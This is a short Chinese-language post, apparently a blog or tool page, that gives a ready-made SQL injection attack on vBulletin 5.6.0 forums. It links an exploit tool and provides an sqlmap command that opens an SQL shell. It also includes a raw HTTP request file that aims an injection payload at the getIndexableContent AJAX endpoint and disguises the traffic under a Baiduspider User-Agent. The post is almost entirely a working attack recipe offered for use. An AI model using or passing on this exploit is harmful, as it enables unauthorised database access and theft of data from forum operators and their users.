vBulletin 5.6.0 SQL injection tool
vBulletin 5.6.0 SQL injection tool
记一次面试题目
IP:NONE
CMS:vBulletin 5.6.0
Attack mode:SQL injection
漏洞相关
工具
Python工具
https://gitee.com/zygds/vBulletin-5.6.0-SQL-injection-tool
Sqlmap:
sqlmap -r 1.txt --sql-shell # 命令可换其他
1.txt
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: # 此处填写ip:post,80,443,不需要填写,记得删除这些文字
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
nodeId[nodeid]=1--
纵饮孤独,程序员的世界是孤独的,这个平台让我们聚集在一起纵饮百年孤独